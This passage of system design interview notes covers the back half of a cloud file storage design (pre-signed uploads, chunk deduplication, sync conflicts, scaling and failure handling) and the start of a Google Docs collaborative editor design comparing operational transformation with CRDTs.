Client calls POST /files/initiate with file metadata and chunk hashes. Backend checks quota and dedup, then asks S3 to generate pre-signed PUT URLs — time-limited tokens (15 min) scoped to exactly one S3 object each.
Client uploads each chunk byte-for-byte directly to S3 using the pre-signed URL. Backend is not involved. S3 validates the token and stores the chunk.
Client calls POST /files/complete with file_id and chunk ETags. Backend writes the metadata record to PostgreSQL and decrements quota atomically.

Trade-off accepted: Client must implement a 3-step upload flow instead of a simple POST. This is acceptable because the client SDK abstracts the flow — users never see it — and the alternative (proxying 25 TB/day) is not an optimization problem but a physics problem.

[!IMPORTANT]
Pre-signed URLs are not just an optimization — they are the only architecture that scales. Proxying 25 TB/day of file uploads through application servers cannot be fixed with more hardware; it requires re-routing the data path entirely.

[!TIP]
In the interview, say: "I chose pre-signed URLs over proxied upload because routing 14.5 GB/sec through application servers creates a bottleneck that cannot be horizontally scaled away — you would need servers sized for bandwidth, not compute. The trade-off I accept is a 3-step client flow, which is hidden inside the SDK."

10.2 Chunk-Level Deduplication via SHA-256

Here is the problem: 50 million uploads/day at 500 KB average = 25 TB/day of raw data. Many of those uploads share content — video edits share 90% of frames, document revisions share most paragraphs, backup tools re-upload unchanged files.

Naive solution — file-level dedup: Hash the whole file, check if hash exists. If yes, skip upload. This catches only exact duplicates — roughly 30% of uploads. Two versions of the same video (one with added intro) share no file hash even though they share 95% of bytes.

Chosen solution — chunk-level content-addressable storage:

Every file is split into 5 MB chunks before upload. Each chunk is hashed with SHA-256 (collision probability negligible). When the client calls POST /files/initiate, it sends the hash list for all chunks. The Upload Service queries the chunks table: which hashes already exist? For existing hashes, no pre-signed URL is issued — the file_chunks join table simply references the existing chunk. The client only uploads genuinely new chunks.

The file_metadata record becomes a list of chunk_hashes in order: [hash_A, hash_B, hash_C]. To reconstruct the file on download, the client (or CDN) fetches chunks in order and concatenates.

Trade-off accepted: Higher metadata DB size — ~100 bytes/chunk record × 200 chunks/file × 10B files = roughly 200 TB of chunk metadata. This is a known, bounded cost. Chunk metadata is small and amenable to compression. The storage savings (60–70% reduction on 27 PB over 5 years) vastly outweigh the metadata overhead.

[!NOTE]
Key Insight: Chunk hashes are content-addressable. The hash IS the storage address. Two users uploading the same popular movie share all 200 chunks — only one copy on disk. Storage cost is amortized across all users. This is the reason Dropbox could undercut competitors on price.

10.3 Sync Conflict Resolution

Here is the problem: Device A and Device B both edit the same file while offline. Both upload when they reconnect. The server sees two uploads targeting the same file_id with the same base version but different content hashes. One of them must win — but silently discarding the other is data loss.

Naive solution — last-write-wins: The second upload overwrites the first. Simple to implement. Silently destroys data whenever two devices are offline simultaneously.

Chosen solution — conflict copy preservation:

Each file carries a version field incremented on every write. On POST /files/complete, the Upload Service checks: does the base_version in the request match the current version in DB? If yes, it is a clean update — increment version and commit. If no, there is a conflict.

On conflict, the server does not reject the upload. Instead it creates a second file_metadata record named file (Device B conflict copy YYYY-MM-DD).ext, pointing to Device B's chunk hashes. Both versions survive. The user sees both in the folder and can manually resolve.

Trade-off accepted: Users must occasionally resolve conflicts manually. This is acceptable because: (1) conflicts only happen when two devices edit the same file offline simultaneously — rare in practice, (2) the alternative (silent data loss or distributed locks requiring both devices online) is worse. The conflict copy UI is a familiar pattern — users understand it.

[!NOTE]
Key Insight: Sync is pull-on-notification, not push. The notification tells the device "something changed." The device decides what to download. This prevents wasting bandwidth pushing large files to mobile devices on limited storage or slow connections.

11. Bottlenecks & Scaling

Bottleneck 1: Metadata DB read throughput (11,500 reads/sec for folder listing)

What breaks first: a single PostgreSQL primary cannot serve 11,500 read requests/sec at p99 less than 50ms while also handling 580 writes/sec for uploads.

Solution: Add read replicas for folder listing queries. Route all write operations (upload initiate, complete, quota update, permission change) to primary. Route all read operations (folder listing, file metadata fetch, permission check for download) to read replicas. Shard by owner_id — all files for one user land on the same shard, keeping parent-child queries local. Add Redis cache for hot folders (team shared drives with many readers).

Bottleneck 2: Notification service fan-out (1,700 WebSocket pushes/sec)

What breaks first: a single notification service node cannot maintain WebSocket connections for 50M DAU. At 50 million users × 3 devices each = 150M persistent connections.

Solution: Horizontal scaling of notification service nodes. Redis stores the mapping of user_id → set of device WebSocket connection IDs (with TTL for cleanup). Each notification service node holds a subset of connections. When a sync event arrives for user_id X, the service looks up X's device connection IDs in Redis and routes to the correct node. Nodes communicate via internal pub/sub.

Bottleneck 3: Chunk metadata lookup for dedup (29,000 chunk operations/sec)

What breaks first: checking 29K chunk hashes/sec against PostgreSQL for dedup will saturate the DB before the upload pipeline.

Solution: Bloom filter in Redis for chunk hashes. Before hitting PostgreSQL, check the Bloom filter — if the hash is definitely not present, skip the DB lookup entirely. Bloom filters have false positives (say "exists" when it does not) but never false negatives. A false positive causes an unnecessary DB lookup — not a correctness problem. A 1% false positive rate reduces DB load by ~70% for a working set that is mostly new content.

[!TIP]
Mention the Bloom filter dedup optimization in interviews — it is a senior-level detail that shows you have thought about the hot path. Say: "I would put a Bloom filter in Redis in front of the chunk hash DB lookup. False positives are acceptable — they just cause an extra DB read. False negatives would break dedup correctness, but Bloom filters never produce false negatives."

12. Failure Scenarios

Failure	Impact	Recovery
DB primary fails	Writes blocked — upload complete, quota update, permission change fail	PostgreSQL replica auto-promoted (RDS Multi-AZ, ~30s failover); upload service retries commit with exponential backoff
S3 availability event	Upload chunks fail mid-flight	Client retries failed chunks individually via new pre-signed URLs; already-uploaded chunks are not re-sent (idempotent by hash)
Message queue outage	S3 upload complete events lost — sync notifications not sent	Polling fallback: upload service polls S3 for pending events on recovery; clients re-sync on reconnect by comparing local version vs server version
Notification service crash	Connected devices stop receiving WebSocket pushes	Clients fall back to polling `/files/changes?since=timestamp` every 30s; WebSocket reconnects on next heartbeat
Redis quota cache failure	Quota checks fall through to PostgreSQL directly	Latency increases for upload initiate; correctness unaffected — PostgreSQL is source of truth; Redis rebuilt on restart
Network partition — client offline	Local changes not uploaded	Client queues pending changes locally; uploads in order on reconnect; conflict detection handles simultaneous edits
Chunk dedup race — two users upload same new chunk simultaneously	Both pass Bloom filter, both write to DB	PostgreSQL unique constraint on `chunk_hash` PK causes one INSERT to fail; second writer treats it as success (chunk already stored) — idempotent

13. Trade-offs

Pre-Signed URL vs Proxy Upload

Dimension	Pre-Signed URL — direct to S3	Proxied Upload — via app server
App server load	Zero — no bytes transit servers	14.5 GB/sec through servers at peak
Throughput ceiling	S3 capacity — effectively unlimited	Application server bandwidth
Upload latency	Client to S3 directly — 1 hop	Client to server to S3 — 2 hops
Security	URL expires in 15 min, scoped to one object	Server controls all access
Client complexity	3-step flow — initiate, upload, complete	Simple POST

Chosen: Pre-signed URLs. We never proxy file bytes through application servers. The trade-off we accept is a 3-step client upload flow, which is acceptable because the client SDK abstracts this entirely.

[!NOTE]
Key Insight: Pre-signed URLs are not just an optimization — they are the only architecture that scales. Proxying 25 TB/day of file uploads is not a latency problem; it is a physics problem.

Chunk-Level Dedup vs File-Level Dedup

Dimension	Chunk-level — 5 MB blocks	File-level — whole file hash
Dedup ratio	60–70% — partial content shared	30% — exact duplicates only
Metadata overhead	N chunk records per file	1 record per file
Partial upload resume	Resume from last successful chunk	Must restart entire file
Bandwidth savings	Upload only unique chunks	Upload whole file or nothing
Implementation complexity	Higher — chunk hash lookup per chunk	Lower — single hash check

Chosen: Chunk-level deduplication. Most storage savings come from shared partial content — video edits, document revisions, backup files with unchanged blocks. File-level dedup only catches exact duplicates. The trade-off we accept is higher metadata DB size (~200 TB of chunk records at scale), which is a known, bounded cost.

[!NOTE]
Key Insight: Chunk-level dedup is the reason Dropbox could undercut competitors on price. Two users uploading the same popular video share all 200 chunks — only one copy on disk. Storage cost is amortized across all users.

PostgreSQL vs NoSQL for Metadata

Dimension	PostgreSQL — chosen	Cassandra or DynamoDB
Directory hierarchy queries	Natural — adjacency list, recursive CTE	Requires denormalization or multiple reads
Permission joins	Native — JOIN file_metadata and permissions	Requires denormalization or application-side join
Quota aggregation	SUM query on owner_id — native SQL	Requires counter table or external aggregation
Consistency	Strong — ACID transactions	Eventual by default
Write throughput	~100K writes/sec sharded by owner_id	Multi-million writes/sec
Operational complexity	Moderate	Higher

Chosen: PostgreSQL with sharding by owner_id. Metadata is fundamentally relational — files have parents, permissions have users, users have quotas. Write volume (~580 uploads/sec) is well within sharded PostgreSQL capacity. The trade-off we accept is sharding complexity, which is acceptable because correctness of permission checks and quota enforcement requires ACID guarantees that NoSQL cannot provide cheaply.

[!NOTE]
Key Insight: The metadata for a storage system is fundamentally relational. Parent-child folder relationships, permission joins, and quota aggregation are natural SQL. NoSQL requires denormalization to express the same relationships — you trade write throughput you do not need for query complexity you must now manage yourself.

Interview Summary

Key Decisions

Decision	Problem It Solves	Trade-off Accepted
Pre-signed URLs — not proxied	25 TB/day of file bytes bypasses application servers	3-step client upload flow; client SDK complexity
Chunk-level dedup via SHA-256	60–70% storage savings; partial upload resume	Chunk metadata overhead in PostgreSQL
Metadata DB — not filesystem	O(1) rename and move; clean permission joins; natural quota aggregation	PostgreSQL sharding complexity at scale
Eventual consistency for sync	High availability; devices sync independently; simple architecture	1–2 second lag before new file appears on other devices
Message queue for S3 to sync	Reliable handoff from upload complete to notification — survives service restarts	200–500ms additional sync latency
CDN for downloads	Sub-50ms download globally for popular shared files	CDN egress cost

Fast Path vs Reliable Path

Fast Path   (throughput):  Client chunks file locally
                           -> Client uploads chunks directly to S3 via pre-signed URL
                           -> S3 emits event to Message Queue

Reliable Path (durability): Metadata DB write before upload confirmed
                            -> Quota enforced atomically on /files/complete
                            -> Notification fan-out only after metadata committed

File bytes  = fast path only  (S3-native, CDN-accelerated on download)
File record = reliable path   (PostgreSQL, ACID, quota-enforced)
Sync signal = reliable path   (MQ -> Notification Service -> WebSocket)

Key Insights Checklist

[!IMPORTANT]
These are the lines that make an interviewer lean forward. Know them cold.

"A folder in Google Drive is not a directory — it is a metadata row." Moving a file is changing a parent_id field. Rename is changing a name field. No bytes move. O(1) regardless of folder size.
"File bytes never touch the application server." Pre-signed URLs send data client to S3 directly. The backend handles only metadata and issues tokens. This is the only architecture that scales to 25 TB/day.
"Deduplication works at the chunk level." Two uploads sharing the same video clip share storage. The second upload is a metadata pointer — no bytes transferred. This is why Dropbox could undercut storage costs.
"Chunking is not just for large files — it enables deduplication, parallel upload, and partial retry." A 1 GB file in 5 MB chunks uploads 200 chunks in parallel and resumes from any failed chunk.
"Sync is pull-on-notification, not push." The notification says 'something changed.' The device decides what to download. This avoids pushing large files to mobile devices on limited storage.
"Metadata is relational — use a relational DB." Parent-child folders, permission joins, quota aggregation are natural SQL. NoSQL requires denormalization to express the same relationships and you trade write throughput you do not need for query complexity you must now manage.

Google Docs (Real-time Collaborative Editor) V2

Arghya Majumder — Fri, 27 Mar 2026 23:29:26 +0000

System Design: Google Docs (Real-time Collaborative Editor)

🧠 Mental Model

Google Docs is not syncing text. It is syncing operations across distributed clients.

This is the insight that unlocks the entire design. When Alice types "R" at position 29, Google Docs does not send the document. It sends { type: "insert", pos: 29, char: "R", version: 42, client_id: "alice" }. The document is a materialized view of a sequence of operations — not the source of truth. The operations log is.

Two users editing the same position at the same millisecond will produce divergent documents unless a conflict resolution algorithm (OT or CRDT) transforms one operation against the other before applying. The entire architecture is organized around making that transformation correct, fast, and durable. Everything else — WebSocket, Cassandra, Redis, S3 — serves those three requirements.

The system runs two paths concurrently:

Fast path: apply locally → send to OT Server → transform → broadcast to peers (optimizes latency)
Reliable path: append to Operations Log before ACK (optimizes durability)

                    ┌──────────────────────────────────────────────────────────┐
                    │                      FAST PATH                            │
  ┌────────┐  op    │  ┌──────────┐  transform  ┌──────────┐  broadcast       │
  │ UserA  │ ──────►│  │OT Server │ ───────────►│OT Server │ ──────► peers    │
  └────────┘        │  └──────┬───┘             └──────────┘                  │
   (optimistic      │         │ concurrent ops                                 │
    local apply)    └─────────┼───────────────────────────────────────────────┘
                              │ append (before broadcast, before client ACK)
                    ┌─────────▼───────────────────────────────────────────────┐
                    │                   RELIABLE PATH                           │
                    │              ┌─────────────────┐                         │
                    │              │ Operations Log   │  <- every op stored    │
                    │              │   (Cassandra)    │     before ACK sent    │
                    │              └─────────────────┘                         │
                    └─────────────────────────────────────────────────────────┘

⚡ Core Design Principle

Principle	Decision	Why
Conflict resolution	Operational Transformation (OT)	Central server already required; OT maps naturally
Operation granularity	Delta (insert/delete + position)	Full file replacement causes last-writer-wins data loss
Transport	WebSocket (persistent, bidirectional)	HTTP request-response cannot push server-initiated ops
Durability	Append-only Operations Log in Cassandra	Event sourcing — replay any version from any point
Latency	Optimistic local apply before server ACK	Visual responsiveness over consistency for text editing
Ephemeral state	Redis with TTL for cursors and presence	Cursor data expires naturally; storing in DB adds write amplification

1. Problem Statement & Scope

Google Docs allows multiple users to edit the same document simultaneously in real time. Changes made by one user appear in every other user's browser within milliseconds. The system must handle billions of documents, millions of concurrent editors, and guarantee zero data loss.

In scope:

Create, read, update, delete documents
Single-user and multi-user real-time collaborative editing
Cursor positions and presence for all active collaborators
Document versioning — save snapshots, restore to any version
Offline editing with automatic sync on reconnect

Out of scope:

Comments and suggestions (separate service)
Permissions and sharing UI (separate IAM service)
Spreadsheets and Slides (different data models)

2. Requirements

Functional Requirements

CRUD Documents — create, open, rename, and delete documents
Real-time collaborative editing — all collaborators see changes within 100ms
Cursor and presence — see where each collaborator's cursor is and who is online
Document versioning — view history, restore to any prior version
Offline editing — buffer local operations while offline, sync on reconnect

Non-Functional Requirements

Requirement	Target
Concurrent active editors	1 million
Total documents	1 billion
Edit propagation latency	< 100ms end-to-end
Data durability	Zero data loss (operations log is source of truth)
Availability	99.99% for solo editing; strong consistency for collaborative editing
Throughput	5 million operations/sec at peak

CAP Discussion

[!NOTE]
Key Insight: Google Docs makes a deliberate CAP choice that varies by editing mode. Solo editing: AP (availability over consistency — your edits always go through even if a replica is stale). Collaborative editing: CP (consistency over availability — all collaborators must converge to the same document state; the OT server is the single ordering point).

For collaborative editing, the OT server acts as the serialization point. If it is unreachable, clients buffer locally and display a "reconnecting" state rather than allowing divergent edits that cannot be reconciled.

3. Back-of-the-Envelope Estimations

Parameter	Value	Reasoning
Total documents	1 billion	Given
Concurrent active editors	1 million	1% of documents active at any time
Operations per editor per second	5	1 keystroke per 200ms
Peak operations/sec	5 million	1M x 5
Operation payload size	~200 bytes	Delta: type + position + char + version + client_id
Operations write throughput	~1 GB/sec	5M x 200B
Snapshot frequency	Every 100 ops	Background compaction
Average document snapshot size	~50 KB	Typical rich-text document
Snapshot storage per day	~500 GB	1M active docs x 1 snapshot/day x 50KB
WebSocket connections	1 million	One persistent connection per active editor
Redis cursor entries	1 million keys	One HSET per active document, TTL = 30s

Cassandra sizing for operations log:

1 GB/sec write throughput -> 86 TB/day at peak (real average ~10x lower -> ~10 TB/day)
Retain raw operations for 30 days -> ~300 TB hot storage
Older operations compacted into snapshots -> S3 for cold storage

WebSocket gateway sizing:

Each WebSocket connection consumes ~64 KB memory at the server
1 million connections -> ~64 GB RAM across gateway fleet
Horizontal scaling: shard by doc_id

4. API Design

REST API (Document Lifecycle)

POST   /api/v1/documents
       Body:     { title, owner_id }
       Response: { doc_id, created_at, blob_url }
       Purpose:  Create a new empty document

GET    /api/v1/documents/{doc_id}
       Response: { metadata, content_url, current_version }
       Purpose:  Fetch document metadata and URL of latest snapshot (served via CDN)

DELETE /api/v1/documents/{doc_id}
       Purpose:  Soft-delete; moves to trash, not immediately purged

GET    /api/v1/documents/{doc_id}/versions
       Response: [{ version_id, created_at, snapshot_url, op_count }]
       Purpose:  List all named versions and auto-snapshots

POST   /api/v1/documents/{doc_id}/versions
       Body:     { label }
       Purpose:  Create a manual named snapshot at current state

WebSocket API (Real-time Editing Session)

WS     /ws/documents/{doc_id}/edit
       Auth: Bearer token (validated on handshake upgrade)
       Sticky routing: client must reconnect to same OT Server node for the document

Client -> Server (operation):
  {
    type:      "operation",
    op: {
      type:      "insert" | "delete",
      pos:       29,
      char:      "R",
      version:   142,
      client_id: "uuid"
    }
  }

Client -> Server (cursor):
  {
    type:      "cursor",
    pos:       29,
    selection: { start: 29, end: 35 }
  }

Server -> Client (transformed operation broadcast):
  {
    type:              "operation",
    op:                { ...original_op },
    transformed_op:    { type: "insert", pos: 30, char: "R" },
    committed_version: 143
  }

Server -> Client (remote cursor):
  {
    type:    "cursor",
    user_id: "alice",
    pos:     15,
    color:   "#FF6B6B"
  }

Server -> Client (presence):
  {
    type:    "presence",
    user_id: "bob",
    status:  "online" | "idle" | "offline"
  }

[!NOTE]
Key Insight: The version field in the operation is the client's local version when the op was generated, not the server's committed version. The OT server uses this gap (client version vs. server version) to determine which concurrent operations must be transformed against.

5. System Architecture

High-Level Architecture

Evolved Architecture: WebSocket Sticky Routing

[!NOTE]
Key Insight: OT requires all operations for a document to pass through a single server — this is a correctness requirement, not a scaling limitation. Without a single ordering point, two OT servers could transform the same pair of concurrent operations in different orders, producing divergent documents. The session map in Redis routes every client for a given doc_id to the same OT Server node.

6. Operation Data Flow

[!IMPORTANT]
This is the flow interviewers want to hear you walk through. Every step has a purpose — know WHY each step exists.

🔄 The One-Line Flow (Say This First)

Client → apply locally → send op → Server → transform against concurrent ops
       → append to log → broadcast transformed op → other clients apply

This is the entire system in one line. Everything else — WebSocket, Cassandra, Redis, OT engine — exists to make each arrow in this flow correct, fast, and durable.

Arrow	Mechanism	Failure mode if skipped
`apply locally`	Optimistic apply before server ACK	Editing feels laggy — 200ms+ perceived latency
`send op`	WebSocket frame with `{type, pos, char, client_version}`	Server cannot transform without the version gap
`transform`	OT function adjusts positions against concurrent ops	Documents diverge — different clients see different text
`append to log`	Cassandra write BEFORE broadcast	Op lost on server crash — cannot replay on reconnect
`broadcast`	Push to all connected clients on same doc_id	Peers never see the change
`other clients apply`	Client-side OT against own pending ops	Client and server state desync — rollback spiral

🔄 Complete Operation Lifecycle

Step 1: Local Apply (client)
Step 2: Send to server (WebSocket)
Step 3: Transform on server (OT Engine)
Step 4: Append to Operations Log (Cassandra)
Step 5: Broadcast transformed op to all peers (WebSocket)
Step 6: Peers apply transformed op to their local doc

Step-by-Step WHY

Step	What happens	Why it must happen this way
1. Local apply	Client applies op to local doc without waiting	Makes editing feel instant — zero perceived latency
2. Send to OT Server	Op sent with `client_version` (doc version when op was generated)	Server needs the version gap to know which concurrent ops to transform against
3. Fetch concurrent ops	Server retrieves all ops committed since `client_version`	These are the ops the client did NOT know about when it generated its op
4. Transform	OT function adjusts positions against each concurrent op	Without this, positions become wrong → documents diverge
5. Append to log	Store BEFORE broadcasting	If server crashes after write but before broadcast, the op is in the log — clients fetch on reconnect
6. ACK to sender	Confirm the op's committed version	Client replaces pending op with committed version — can now generate next op correctly
7. Broadcast to peers	Push transformed op to all connected clients	Peers apply the server-transformed version, not the raw client version

[!NOTE]
Key Insight: The client_version is the crucial field. It tells the server "when I generated this op, I had seen operations up to version N." The server's job is to transform the op against everything that happened between version N and now. This is the entire OT algorithm in one sentence.

6b. Separation of Concerns

The system has three distinct layers. Keeping them separate is what makes the design scalable and debuggable.

Layer	Component	Responsibility	Why separated
Client	Editor	Local document model, keystrokes, rendering	Must be fast — no server round-trip
Client	Client OT Engine	Transform incoming remote ops against pending local ops	Client has unACKed ops the server hasn't seen yet
Sync	WebSocket Gateway	Auth, sticky routing, connection lifecycle	Stateless routing layer — separate from OT logic
Sync	OT Server	Canonical transformation and ordering point	Stateful per-document — must not be distributed
Storage	Operations Log	Durable, replayable event source	Decoupled from serving layer — allows versioning/audit
Storage	Snapshots	Fast initial load	Log replay from op 1 is too slow for large documents
Storage	Redis	Ephemeral state (cursors, presence, session map)	High-frequency writes with natural expiry — wrong fit for DB

[!NOTE]
Key Insight: The Client OT Engine and the Server OT Engine are both necessary. The server transforms incoming ops against other clients' concurrent ops. The client transforms incoming remote ops against its own locally-pending (unACKed) ops. Neither can be skipped. Remove the client engine and cursor positions break whenever you have network lag.

6c. Consistency Model

Eventual Consistency + Strong Convergence

Google Docs is an eventually consistent system with a strong convergence guarantee.

Property	Definition	Google Docs guarantee
Eventual consistency	All replicas will agree on the same state... eventually	Yes — given no new ops, all clients converge
Strong convergence	If two replicas have applied the same set of ops (in any order), they are in the same state	Yes — OT's transformation property ensures this
Linearizability	Every op appears to execute atomically at a single point in time	No — not required for a text editor
Causal consistency	If op A happened before op B (as seen by the client), all clients see A before B	Yes — client version numbers enforce causal ordering

Eventual consistency in practice:
  Alice:  "Hello"  →  "Hello World"  →  "Hello World!"
  Bob:     "Hello"  →  "Hello !"      →  "Hello World!"
                                               ↑
                              Both converge here after transformation

Strong convergence is what OT (and CRDT) provide. It means:

Two clients applying the same set of operations will always reach the same final document state
The ORDER in which concurrent ops are applied does not matter — transformation corrects positions
This holds even with network delays, reordering, or reconnection

[!NOTE]
Key Insight: Google Docs does NOT guarantee that Alice and Bob see the same document at the same millisecond — that would require linearizability, which is prohibitively expensive at this scale. It guarantees that they converge to the same document. The gap is usually < 100ms and invisible to users.

6d. Edge Cases

Out-of-Order Operations

Problem: Network reordering means op at version 44 arrives before op at version 43.

Solution: The OT server enforces ordering at the log level. Every op gets a monotonically increasing server version on commit. Clients buffer ops received out of order and apply them in version order.

Client receives: [ver=44 op], [ver=43 op]
                      ↓
Buffer: { 43: pending, 44: pending }
Wait for ver 43 → apply 43 → apply 44

[!NOTE]
Key Insight: The server version number is the total ordering mechanism. It converts the partial order (concurrent client ops) into a total order (globally committed sequence). Without it, clients would need vector clocks to detect ordering, which is far more complex.

Duplicate Operations (At-Least-Once Delivery)

Problem: Client sends op, server commits and appends to log, but crashes before sending ACK. Client retries — duplicate op arrives.

Solution: Each op carries (client_id, client_seq). OT Server checks Redis before processing:

GET dedup:{client_id}:{client_seq}
  → exists:  duplicate — return previously committed server_version, drop op
  → missing: process normally, SET dedup:{client_id}:{client_seq} {server_ver} EX 3600

Network Delay and Reconnection

Problem: Client loses connection for 30 seconds. Misses 150 ops from other users. On reconnect, their local document is stale.

Solution: Operation log catch-up

[!NOTE]
Key Insight: The Operations Log is not just for versioning — it is the reconnection mechanism. Every client disconnect/reconnect is handled identically: fetch ops since last_known_version from Cassandra, transform against local pending ops, apply. This also handles the offline editing case (F2 in the Frontend section).

7. Deep Dives

6.1 The Three Approaches to Collaborative Editing

This is the most important section of the design. Three approaches exist, and two of them fail at scale or correctness.

Approach 1: File Replacement (Brute Force)

Idea: On every keystroke, serialize the entire document, send it to the server, server overwrites storage, broadcasts new document to all clients.

Problems:

(a) Payload is enormous. A 100 KB document sends 100 KB per keystroke. At 5 ops/sec per user x 1M users = 500 GB/sec of document content transfer. Catastrophic.

(b) Concurrent writes cause silent data loss. Alice and Bob both read version N, both write version N+1 with their own changes. Bob's write overwrites Alice's. Last writer wins — Alice's work silently disappears.

(c) DOM re-render cost. The client must diff the entire document on every update to determine what changed for DOM patching.

Verdict: Rejected.

Approach 2: Locking Protocol

Idea: Prevent concurrent edits by serializing access.

Pessimistic locking: A user acquires an exclusive lock on the document before editing. Others see a read-only view until the lock is released.

Problem: Completely incompatible with real-time collaboration. If Alice locks a document for 2 minutes of typing, Bob is frozen.

Optimistic locking: Users edit freely, but on commit the server checks if the base version is still current. If another write happened, the commit is rejected and the user must manually merge.

Problem: Acceptable for code (Git), but unacceptable for a text editor. Users cannot be asked to resolve merge conflicts for every paragraph.

Verdict: Rejected for real-time collaborative editing.

Approach 3: Delta-Based with Conflict Resolution (OT or CRDT)

Idea:

Send only the operation delta: { type: "insert", pos: 29, char: "R" } — not the whole file.
Use a persistent WebSocket for low-latency bidirectional messaging.
Use a conflict resolution algorithm (OT or CRDT) to reconcile concurrent operations before applying them.

The Alice/Bob Problem — Why Naive Delta Merge Fails:

Initial document: "BC"

Alice: insert "A" at position 0  ->  her local state: "ABC"
Bob:   insert "D" at position 2  ->  his local state:  "BCD"

Naive server merge (apply both without transformation):
  Server applies Alice's op first: "ABC"
  Server applies Bob's op (D at pos 2): "ABDC"   <- Alice sees "ABDC"
  Bob applied D to "BCD" then receives Alice's op  -> Bob sees "ABCD"

Alice sees "ABDC", Bob sees "ABCD" -- DIVERGED. Documents are inconsistent.

With OT (Operational Transformation):

Bob's op insert("D", pos=2) was generated against version "BC" (before Alice's insert)
The server knows Alice's op happened first (committed at version 1)
The OT server transforms Bob's op: Alice inserted at pos 0, which shifts all positions right by 1 — Bob's pos 2 becomes pos 3
Transformed op: insert("D", pos=3)
Both Alice and Bob converge to: "ABCD" ✓

Verdict: CHOSEN. Delta-based operations with OT conflict resolution.

6.2 OT vs CRDT — The Core Algorithm Choice

Both OT and CRDT solve the concurrent edit problem. They take fundamentally different approaches. Understanding both deeply — including CRDT's real production costs — is what separates a junior answer ("use CRDT, it's simpler") from a senior answer.

OT (Operational Transformation)

The server maintains a canonical operation history for the document
When a client op arrives, the server checks: which ops were committed since the client's last known version?
The transformation function adjusts the incoming op's position against each concurrent op
All operations for a document must pass through a single server (the ordering point)

Transformation rules (simplified):

Concurrent ops	Rule
Insert(A) vs Insert(B), A <= B	B becomes B + 1
Insert(A) vs Insert(B), A > B	B stays B
Insert(A) vs Delete(B), A <= B	B becomes B + 1
Delete(A) vs Delete(B), A < B	B becomes B - 1
Delete(A) vs Delete(B), A >= B	B stays B

CRDT (Conflict-free Replicated Data Type)

CRDT = Conflict-free Replicated Data Type. The core guarantee: any two peers that have seen the same set of operations will converge to the same document state — regardless of the order in which those operations arrived. No central server required to enforce this. The data structure itself makes convergence guaranteed.

The fundamental difference from OT: OT needs a server to impose order before merging. CRDT makes operations commutative — you can apply them in any order and always get the same result.

How CRDT Merge Works (Operation-Based)

In the operation-based model (which is what text editors use), each peer sends only the delta — the operation — not the full document. The key insight is that every character gets a permanent unique identity, not an integer position that shifts when other chars are inserted.

Each character carries:
  id:    a unique identifier (never reused, even after deletion)
  after: the id of the character this was inserted after (the "anchor")
  value: the character itself

The same Alice/Bob problem — solved with CRDT:

Recall the problem from the OT section:

Document: "BC"   (B has id=1, C has id=2)

Alice inserts "A" at the start:
  OT op:   { insert, pos=0, char="A" }       ← integer position, shifts on merge
  CRDT op: { id=3, after=START, value="A" }  ← anchored to START, never shifts
  Alice's state: "ABC"

Bob inserts "D" after "C":
  OT op:   { insert, pos=2, char="D" }       ← integer position 2, relative to "BC"
  CRDT op: { id=4, after=id2, value="D" }    ← anchored to C (id=2), never shifts
  Bob's state: "BCD"

Why OT fails without a server and CRDT doesn't:

With OT, when Alice's op arrives at Bob, Bob must transform it — "Alice inserted at position 0, so my position 2 must shift to position 3." That transformation requires knowing the commit order, which requires a server.

With CRDT, no transformation is needed:

Alice's op says: "put 'A' after START." That's true regardless of what Bob did.
Bob's op says: "put 'D' after id=2 (C)." That's true regardless of what Alice did.

Both peers simply apply both ops:

  START → A(id=3) → B(id=1) → C(id=2) → D(id=4)
  Rendered: "ABCD"  ✓

Alice applies Bob's op:   START → A(id=3) → B(id=1) → C(id=2) → D(id=4) = "ABCD" ✓
Bob applies Alice's op:   START → A(id=3) → B(id=1) → C(id=2) → D(id=4) = "ABCD" ✓
Both converge without any server involvement.

The key difference in one line:

OT says "insert at position N" — positions shift, so a server must impose order before transforming.
CRDT says "insert after character X (by id)" — ids never shift, so any peer can merge in any order.

What if two peers insert at the same anchor concurrently?

Document: "AC"  (A has id=1, C has id=2)

Alice types "B" after A:  op { id=3, after=id1, value="B" }  →  "ABC"
Bob   types "X" after A:  op { id=4, after=id1, value="X" }  →  "AXC"

Both ops say "after id=1". Tie-break: sort by peer identity (e.g. alphabetical).
"alice" < "bob" → Alice's character goes first.

Both peers converge to: "ABXC"  ✓  (consistent, even if arbitrary)

The result is always consistent. The tie-break is arbitrary but deterministic — the same rule on every peer produces the same order. OT has the same limitation: the server picks a commit order that's equally arbitrary.

Tombstoning — The Hidden Cost of CRDT

Deleted characters cannot be physically removed from a CRDT. This is the most important production constraint.

Here's why:

Document: A(id=1) → B(id=2) → C(id=3)

Alice deletes B. Her view: A(id=1) → C(id=3)

Bob (offline) types "D" after B — his op says: "after id=2"

Bob reconnects. If B was physically deleted, id=2 no longer exists.
Bob's operation has no anchor — it cannot be placed correctly.

Solution: B becomes a tombstone — invisible to the user, but still in the structure:
  A(id=1) → [B, id=2, deleted] → D(id=4) → C(id=3)
  Rendered: "ADC"

At scale: A heavily-edited document accumulates tombstones — invisible deleted characters that stay in memory on every client. A 10,000-word document could have 50,000 tombstones. Periodic cleanup ("compaction") removes them once every peer has confirmed they've seen the deletion — but coordinating that cleanup across offline mobile clients is a hard engineering problem.

[!NOTE]
Key Insight: Tombstoning is not a bug — it is the price of CRDT's "no central server" guarantee. You cannot fully delete a character until every peer has acknowledged the deletion. OT has no tombstoning because the server is always the ordering authority — deletion is final immediately.

OT vs CRDT — Comparison

Dimension	OT	CRDT
Server required	Yes — single central ordering server per document	No — peers merge independently
Conflict resolution	Transform function adjusts positions against concurrent ops	Operations are self-describing (anchor by id) — no transform needed
Offline editing	Hard — must reconnect to server to reconcile	Native — peers merge op sets in any order
Deletion	Final — server confirms immediately	Tombstone — char stays in structure until all peers confirm
Compaction overhead	None	Required — periodic cleanup of accumulated tombstones
Data structures	Linear text (transform rules don't generalize)	Arbitrary structures (JSON trees, shapes)
Used by	Google Docs (historically)	VS Code Live Share, Figma, Notion

Chosen for this design: OT

[!NOTE]
Key Insight: OT vs CRDT is not about which is "better" — it is about topology. OT requires a central server, which is a cost only if you don't already have one. Google Docs already has a central server for auth, versioning, and billing — OT's requirement is free. CRDT's advantages (no server, offline-native) only matter when you genuinely need peer-to-peer or multi-region without a single home region.

6.3 Fast Path vs Reliable Path

Every operation in Google Docs travels both paths simultaneously.

Fast Path (Latency-Optimized)

The client applies the operation to its local document model before the operation reaches the server. The user sees their keystroke reflected in the UI with zero network latency. If the server later transforms the operation, the client reconciles silently.

[!NOTE]
